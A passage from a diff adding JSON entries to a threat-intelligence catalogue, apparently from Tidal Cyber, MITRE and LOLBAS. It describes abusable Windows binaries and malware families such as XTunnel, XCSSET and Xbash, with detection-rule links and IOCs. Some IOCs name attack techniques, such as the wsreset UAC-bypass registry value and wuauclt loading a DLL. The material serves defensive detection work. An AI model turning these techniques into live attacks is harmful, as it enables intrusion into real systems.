"29f24b94-b871-4306-b75b-0a4b01860d0c", + "type": "similar" + } + ], + "uuid": "7720f60a-5c03-4241-b635-6313eceb3307", + "value": "WorkFolders" + }, + { + "description": "[[Wscript.exe - LOLBAS Project](/references/6c536675-84dd-44c3-8771-70120b413db7)]", + "meta": { + "id": "45b873fa-6ccc-4c51-aeb1-29a9a92a587f", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "be8d1032-3452-4d44-83cb-c7ece7d5a052", + "type": "similar" + } + ], + "uuid": "eb4ba697-857a-4e23-9eff-f3aacdaaaa46", + "value": "Wscript.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to execute scripts\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\wscript.exe\n* C:\\Windows\\SysWOW64\\wscript.exe\n\n**Resources:**\n* [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n\n**Detection:**\n* Sigma: [proc_creation_win_wscript_cscript_script_exec.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml)\n* Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml)\n* Sigma: [image_load_susp_script_dotnet_clr_dll_load.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml)\n* Elastic: [defense_evasion_unusual_dir_ads.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml)\n* Elastic: [command_and_control_remote_file_copy_scripts.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml)\n* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)\n* Splunk: [wscript_or_cscript_suspicious_child_process.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Wscript.exe executing code from alternate data streams\n* IOC: DotNet CLR libraries loaded into wscript.exe\n* IOC: DotNet CLR Usage Log - wscript.exe.log[[Wscript.exe - LOLBAS Project](/references/6c536675-84dd-44c3-8771-70120b413db7)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5178", + "source": "Tidal Cyber", + "tags": [ + "b4520b56-73e3-43fd-9f0d-70191132b451", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "407274be-1820-4a84-939e-629313f4de1d", + "type": "used-by" + }, + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "eb4ba697-857a-4e23-9eff-f3aacdaaaa46", + "type": "similar" + } + ], + "uuid": "be8d1032-3452-4d44-83cb-c7ece7d5a052", + "value": "Wscript" + }, + { + "description": "[[Wsl.exe - LOLBAS Project](/references/c147902a-e8e4-449f-8106-9e268d5367d8)]", + "meta": { + "id": "7a6e5ea8-c20a-49e7-844a-fe511889b564", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "9663965e-0fd1-45c3-a138-c7539ed91832", + "type": "similar" + } + ], + "uuid": "b7b8a330-d1f6-48f6-b49a-cbe7a786d1a3", + "value": "Wsl.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows subsystem for Linux executable\n\n**Author:** Matthew Brown\n\n**Paths:**\n* C:\\Windows\\System32\\wsl.exe\n\n**Resources:**\n* [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* [https://twitter.com/nas_bench/status/1535431474429808642](https://twitter.com/nas_bench/status/1535431474429808642)\n\n**Detection:**\n* Sigma: [proc_creation_win_wsl_lolbin_execution.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Child process from wsl.exe[[Wsl.exe - LOLBAS Project](/references/c147902a-e8e4-449f-8106-9e268d5367d8)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5251", + "source": "Tidal Cyber", + "tags": [ + "96ebb518-7c1f-4011-a3ec-42aa78a95e4f", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "b7b8a330-d1f6-48f6-b49a-cbe7a786d1a3", + "type": "similar" + } + ], + "uuid": "9663965e-0fd1-45c3-a138-c7539ed91832", + "value": "Wsl" + }, + { + "description": "[[Wsreset.exe - LOLBAS Project](/references/24b73a27-f2ec-4cfa-a9df-59d4d4c1dd89)]", + "meta": { + "id": "72ce2857-99d8-424a-b4ac-c04907124185", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "b75e4dcf-62ed-44cc-b9d2-d6d1b90955a8", + "type": "similar" + } + ], + "uuid": "1736ed77-6f0e-4e70-89b1-8e41a005aae3", + "value": "Wsreset.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used to reset Windows Store settings according to its manifest file\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\wsreset.exe\n\n**Resources:**\n* [https://www.activecyber.us/activelabs/windows-uac-bypass](https://www.activecyber.us/activelabs/windows-uac-bypass)\n* [https://twitter.com/ihack4falafel/status/1106644790114947073](https://twitter.com/ihack4falafel/status/1106644790114947073)\n* [https://github.com/hfiref0x/UACME/blob/master/README.md](https://github.com/hfiref0x/UACME/blob/master/README.md)\n\n**Detection:**\n* Sigma: [proc_creation_win_uac_bypass_wsreset_integrity_level.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml)\n* Sigma: [proc_creation_win_uac_bypass_wsreset.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml)\n* Sigma: [registry_event_bypass_via_wsreset.yml#](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml#)\n* Splunk: [wsreset_uac_bypass.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/wsreset_uac_bypass.yml)\n* IOC: wsreset.exe launching child process other than mmc.exe\n* IOC: Creation or modification of the registry value HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\n* IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen[[Wsreset.exe - LOLBAS Project](/references/24b73a27-f2ec-4cfa-a9df-59d4d4c1dd89)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5179", + "source": "Tidal Cyber", + "tags": [ + "291fab5d-e732-4b19-83e4-ee642b2ae0f0", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "1736ed77-6f0e-4e70-89b1-8e41a005aae3", + "type": "similar" + } + ], + "uuid": "b75e4dcf-62ed-44cc-b9d2-d6d1b90955a8", + "value": "Wsreset" + }, + { + "description": "[[wt.exe - LOLBAS Project](/references/bbdd85b0-fdbb-4bd2-b962-a915c23c83c2)]", + "meta": { + "id": "6f1cff42-3758-4eb6-b43f-18003d6d8edb", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "a34b303e-e8bb-48b2-85e0-f6e2620d68ab", + "type": "similar" + } + ], + "uuid": "11184347-6e49-4c9c-b730-636f2db7bdf6", + "value": "wt.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Terminal\n\n**Author:** Nasreddine Bencherchali\n\n**Paths:**\n* C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_\\wt.exe\n\n**Resources:**\n* [https://twitter.com/nas_bench/status/1552100271668469761](https://twitter.com/nas_bench/status/1552100271668469761)\n\n**Detection:**\n* Sigma: [proc_creation_win_windows_terminal_susp_children.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml)[[wt.exe - LOLBAS Project](/references/bbdd85b0-fdbb-4bd2-b962-a915c23c83c2)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5184", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "11184347-6e49-4c9c-b730-636f2db7bdf6", + "type": "similar" + } + ], + "uuid": "a34b303e-e8bb-48b2-85e0-f6e2620d68ab", + "value": "wt" + }, + { + "description": "[[wuauclt.exe - LOLBAS Project](/references/09229ea3-ffd8-4d97-9728-f8c683ef6f26)]", + "meta": { + "id": "fcc59f33-7732-4dcc-b1cf-4f78a2459a74", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "06fe608d-a517-492f-8557-cfb820984146", + "type": "similar" + } + ], + "uuid": "1fa5cc14-037c-4940-9816-76e009769429", + "value": "wuauclt.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Update Client\n\n**Author:** David Middlehurst\n\n**Paths:**\n* C:\\Windows\\System32\\wuauclt.exe\n\n**Resources:**\n* [https://dtm.uk/wuauclt/](https://dtm.uk/wuauclt/)\n\n**Detection:**\n* Sigma: [net_connection_win_wuauclt_network_connection.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml)\n* Sigma: [proc_creation_win_lolbin_wuauclt.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml)\n* Sigma: [proc_creation_win_wuauclt_execution.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wuauclt_execution.yml)\n* IOC: wuauclt run with a parameter of a DLL path\n* IOC: Suspicious wuauclt Internet/network connections[[wuauclt.exe - LOLBAS Project](/references/09229ea3-ffd8-4d97-9728-f8c683ef6f26)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5180", + "source": "Tidal Cyber", + "tags": [ + "03f0e493-63ae-47b5-8353-238390a895a8", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "1fa5cc14-037c-4940-9816-76e009769429", + "type": "similar" + } + ], + "uuid": "06fe608d-a517-492f-8557-cfb820984146", + "value": "wuauclt" + }, + { + "description": "[[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)]", + "meta": { + "id": "f03d380b-2f8c-4131-ba2f-d16c9c550413" + }, + "related": [ + { + "dest-uuid": "6f411b69-6643-4cc7-9cbd-e15d9219e99c", + "type": "similar" + } + ], + "uuid": "469e0e63-774e-4627-8e71-d4b206958acf", + "value": "OSX.Sofacy" + }, + { + "description": "[XAgentOSX](https://app.tidalcyber.com/software/6f411b69-6643-4cc7-9cbd-e15d9219e99c) is a trojan that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) on OS X and appears to be a port of their standard [CHOPSTICK](https://app.tidalcyber.com/software/01c6c49a-f7c8-44cd-a377-4dfd358ffeba) or XAgent trojan. [[XAgentOSX 2017](https://app.tidalcyber.com/references/2dc7a8f1-ccee-46f0-a995-268694f11b02)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0161", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "59a97b15-8189-4d51-9404-e1ce8ea4a069", + "type": "similar" + }, + { + "dest-uuid": "469e0e63-774e-4627-8e71-d4b206958acf", + "type": "similar" + } + ], + "uuid": "6f411b69-6643-4cc7-9cbd-e15d9219e99c", + "value": "XAgentOSX" + }, + { + "description": "[Xbash](https://app.tidalcyber.com/software/ab442140-0761-4227-bd9e-151da5d0a04f) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://app.tidalcyber.com/software/ab442140-0761-4227-bd9e-151da5d0a04f) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.[[Unit42 Xbash Sept 2018](https://app.tidalcyber.com/references/21b890f7-82db-4840-a05e-2155b8ddce8c)]", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S0341", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6a92d80f-cc65-45f6-aa66-3cdea6786b3c", + "type": "similar" + } + ], + "uuid": "ab442140-0761-4227-bd9e-151da5d0a04f", + "value": "Xbash" + }, + { + "description": "[xCaon](https://app.tidalcyber.com/software/11a0dff4-1dc8-4553-8a38-90a07b01bfcd) is an HTTP variant of the [BoxCaon](https://app.tidalcyber.com/software/d3e46011-3433-426c-83b3-61c2576d5f71) malware family that has used by [IndigoZebra](https://app.tidalcyber.com/groups/988f5312-834e-48ea-93b7-e6e01ee0938d) since at least 2014. [xCaon](https://app.tidalcyber.com/software/11a0dff4-1dc8-4553-8a38-90a07b01bfcd) has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.[[Checkpoint IndigoZebra July 2021](https://app.tidalcyber.com/references/cf4a8c8c-eab1-421f-b313-344aed03b42d)][[Securelist APT Trends Q2 2017](https://app.tidalcyber.com/references/fe28042c-d289-463f-9ece-1a75a70b966e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0653", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "988f5312-834e-48ea-93b7-e6e01ee0938d", + "type": "used-by" + }, + { + "dest-uuid": "21583311-6321-4891-8a37-3eb4e57b0fb1", + "type": "similar" + } + ], + "uuid": "11a0dff4-1dc8-4553-8a38-90a07b01bfcd", + "value": "xCaon" + }, + { + "description": "[xCmd](https://app.tidalcyber.com/software/d943d3d9-3a99-464f-94f0-95aa7963d858) is an open source tool that is similar to [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) and allows the user to execute applications on remote systems. [[xCmd](https://app.tidalcyber.com/references/430fc6ef-33c5-4cd8-b785-358e4aae5230)]", + "meta": { + "platforms": [], + "software_attack_id": "S0123", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5307bba1-2674-4fbd-bfd5-1db1ae06fc5f", + "type": "used-by" + }, + { + "dest-uuid": "4fa49fc0-9162-4bdb-a37e-7aa3dcb6d38b", + "type": "similar" + } + ], + "uuid": "d943d3d9-3a99-464f-94f0-95aa7963d858", + "value": "xCmd" + }, + { + "description": "xcopy is a Windows tool used to copy files and directories, including subdirectories, with a variety of options. According to Microsoft, the `xcopy` command \"creates files with the archive attribute set, whether or not this attribute was set in the source file\".[[xcopy Microsoft](/references/05e01751-ebb4-4b09-be89-4e405ab7e7e4)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5019", + "source": "Tidal Cyber", + "tags": [ + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + } + ], + "uuid": "84954209-1e2a-48dd-ba17-0f015f6de3ef", + "value": "xcopy" + }, + { + "description": "[[malwarebyteslabs xcsset dubrobber](https://app.tidalcyber.com/references/11ef576f-1bac-49e3-acba-85d70a42503e)]", + "meta": { + "id": "6ca09437-11e8-406e-9cdc-06f7a8a92dd2" + }, + "related": [ + { + "dest-uuid": "3672ecfa-20bf-4d69-948d-876be343563f", + "type": "similar" + } + ], + "uuid": "66b2ced3-eab8-4586-91e0-5eedf642953f", + "value": "OSX.DubRobber" + }, + { + "description": "[XCSSET](https://app.tidalcyber.com/software/3672ecfa-20bf-4d69-948d-876be343563f) is a macOS modular backdoor that targets Xcode application developers. [XCSSET](https://app.tidalcyber.com/software/3672ecfa-20bf-4d69-948d-876be343563f) was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.[[trendmicro xcsset xcode project 2020](https://app.tidalcyber.com/references/0194bb11-8b97-4d61-8ddb-824077edc7db)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0658", + "source": "MITRE", + "tags": [ + "4a457eb3-e404-47e5-b349-8b1f743dc657", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "e14085cb-0e8d-4be6-92ba-e3b93ee5978f", + "type": "similar" + }, + { + "dest-uuid": "66b2ced3-eab8-4586-91e0-5eedf642953f", + "type": "similar" + } + ], + "uuid": "3672ecfa-20bf-4d69-948d-876be343563f", + "value": "XCSSET" + }, + { + "description": "XMRig is an open-source tool that uses the resources of the running system to mine Monero cryptocurrency. According to U.S. cybersecurity authorities, \"XMRig can cause a victim computer to overheat and perform poorly by using additional system resources that would otherwise not be active\".[[U.S. CISA Trends June 30 2020](/references/b97e9a02-4cc5-4845-8058-0be4c566cd7c)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5064", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "15787198-6c8b-4f79-bf50-258d55072fee", + "291c006e-f77a-4c9c-ae7e-084974c0e1eb", + "4fa6f8e1-b0d5-4169-8038-33e355c08bde", + "efa33611-88a5-40ba-9bc4-3d85c6c8819b", + "8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "b82c6ed1-c74a-4128-8b4d-18d1e17e1134", + "type": "used-by" + }, + { + "dest-uuid": "325c11be-e1ee-47db-afa6-44ac5d16f0e7", + "type": "used-by" + } + ], + "uuid": "1491c020-6449-48e7-8ebf-abf7b71fbc97", + "value": "XMRig" + }, + { + "description": "", + "meta": { + "id": "d87a0c56-8d14-47f5-849e-afbce09be2b2", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "19e7e967-7d0a-4930-8ef9-11a43dcb081d", + "type": "similar" + } + ], + "uuid": "0baa74ce-ec67-49f5-a3b7-a83e99dd5753", + "value": "xpack.exe" + }, + { + "description": "According to joint Cybersecurity Advisory AA23-250A (September 2023), Xpack is a malicious, \"custom .NET loader that decrypts (AES), loads, and executes accompanying files\".[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5048", + "source": "Tidal Cyber", + "tags": [ + "15787198-6c8b-4f79-bf50-258d55072fee", + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0baa74ce-ec67-49f5-a3b7-a83e99dd5753", + "type": "similar" + } + ], + "uuid": "19e7e967-7d0a-4930-8ef9-11a43dcb081d", + "value": "Xpack" + }, + { + "description": "[[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)]", + "meta": { + "id": "9737efb9-f0ed-412b-8513-fef883c77e34" + }, + "related": [ + { + "dest-uuid": "133136f0-7254-4cec-8710-0ab99d5da4e5", + "type": "similar" + } + ], + "uuid": "c2269965-aafe-45b9-9852-4c80af005bfa", + "value": "Trojan.Shunnael" + }, + { + "description": "[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)][[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)]", + "meta": { + "id": "1e1bd704-9105-4f94-8c6c-25bc69aa9dd9" + }, + "related": [ + { + "dest-uuid": "133136f0-7254-4cec-8710-0ab99d5da4e5", + "type": "similar" + } + ], + "uuid": "c7a0f216-1bae-4ef7-b37e-5d6df89c8997", + "value": "X-Tunnel" + }, + { + "description": "[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]", + "meta": { + "id": "bf7ff22e-0774-48b5-806e-8fc3a2abc3fc" + }, + "related": [ + { + "dest-uuid": "133136f0-7254-4cec-8710-0ab99d5da4e5", + "type": "similar" + } + ], + "uuid": "22ca51f0-cded-4fd9-99c1-5bd55f57bc56", + "value": "XAPS" + }, + { + "description": "[XTunnel](https://app.tidalcyber.com/software/133136f0-7254-4cec-8710-0ab99d5da4e5) a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) during the compromise of the Democratic National Committee. [[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)] [[Invincea XTunnel](https://app.tidalcyber.com/references/43773784-92b8-4722-806c-4b1fc4278bb0)] [[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0117", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "7343e208-7cab-45f2-a47b-41ba5e2f0fab", + "type": "similar" + }, + { + "dest-uuid": "c2269965-aafe-45b9-9852-4c80af005bfa", + "type": "similar" + }, + { + "dest-uuid": "c7a0f216-1bae-4ef7-b37e-5d6df89c8997", + "type": "similar" + }, + { + "dest-uuid": "22ca51f0-cded-4fd9-99c1-5bd55f57bc56", + "type": "similar" + } + ], + "uuid": "133136f0-7254-4cec-8710-0ab99d5da4e5", + "value": "XTunnel" + }, + { + "description": "[[Xwizard.exe - LOLBAS Project](/references/573df5d1-83e7-4437-bdad-604f093b3cfd)]", + "meta": { + "id": "35261d88-d6ec-481d-bd77-e881266c8740", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "d5663ff2-904b-42d6-b4d8-672017d91de2", + "type": "similar" + } + ], + "uuid": "3305e7bb-d304-4bf6-ad90-70aac0dd564c", + "value": "Xwizard.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Execute custom class that has been added to the registry or download a file with Xwizard.exe\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\xwizard.exe\n* C:\\Windows\\SysWOW64\\xwizard.exe\n\n**Resources:**\n* [http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/](http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/)\n* [https://www.youtube.com/watch?v=LwDHX7DVHWU](https://www.youtube.com/watch?v=LwDHX7DVHWU)\n* [https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5](https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5)\n* [https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/](https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/)\n* [https://twitter.com/notwhickey/status/1306023056847110144](https://twitter.com/notwhickey/status/1306023056847110144)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_class_exec_xwizard.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml)\n* Sigma: [proc_creation_win_lolbin_dll_sideload_xwizard.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml)\n* Elastic: [execution_com_object_xwizard.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)[[Xwizard.exe - LOLBAS Project](/references/573df5d1-83e7-4437-bdad-604f093b3cfd)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5181", + "source": "Tidal Cyber", + "tags": [ + "c37d2f5f-91da-43c6-869e-192bf0e0ae90", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3305e7bb-d304-4bf6-ad90-70aac0dd564c", + "type": "similar" + } + ], + "uuid": "d5663ff2-904b-42d6-b4d8-672017d91de2", + "value": "Xwizard" + }, + { + "description": "[YAHOYAH](https://app.tidalcyber.com/software/0844bc42-5c29-47c3-b1b3-6bfffbf1732a) is a Trojan used by [Tropic Trooper](https://app.tidalcyber.com/groups/0a245c5e-c1a8-480f-8655-bb2594e3266b) as a second-stage backdoor.[[TrendMicro TropicTrooper 2015](https://app.tidalcyber.com/references/65d1f980-1dc2-4d36-8148-2d8747a39883)]", + "meta": { + "platforms": [ + "Windows" + ], 